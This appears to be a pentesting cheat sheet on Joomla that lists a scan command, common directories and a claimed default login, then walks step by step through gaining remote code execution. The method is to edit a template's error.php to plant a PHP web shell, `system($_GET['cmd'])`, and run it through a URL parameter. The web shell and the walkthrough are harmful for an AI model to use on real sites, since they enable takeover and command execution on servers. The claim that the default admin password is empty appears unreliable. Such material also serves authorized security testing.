Joomla CMS Pentesting

Joomla is a content managemen system (CMS).

- [cmsjunkie](https://www.cmsjunkie.com/blog/post/understanding-the-joomla-directory-structure)

Scan

joomscan -u https://example.com


Common Directories

/administrator/
/administrator/manifests/files/joomla.xml
/cache/
/components/
/configuration.php
/htaccess.txt
/includes/
/index.php
/joomla.xml
/language/en-GB/en-GB.xml
/libraries/
/LICENSE.txt
/logs/
/media/
/modules/
/plugins/
/README.txt
/templates/
/tmp/
/web.config.txt


Default Credentials

The default username is "admin" and no password.


RCE

Reference: HackTricks

If we have admin credential, we may be able to execute arbitrary code by manipulating the site template.

1. Login as Admin

At first, go to /administrator page and login with admin credential.

2. Select Template

In dashboard, go to template select menu, and click a template name. We can see the list of pages of the template on left menu.
Here we edit the error.php so click it on the left menu.

3. Inject Arbitrary Code

In the editor for error.php, delete the original PHP code and insert arbitrary PHP code such as:

<?php system($_GET['cmd']); ?>

If we want to get the target shell, we can insert the code for reverse shell. Please see the Web Reverse Shell page for details.
After that, click Save & Close .

4. Execute

Now access to the template’s error.php page as below:

https://example.com/templates/<template_name>/error.php
# or
https://example.com/templates/<template_name>/error.php?cmd=whoami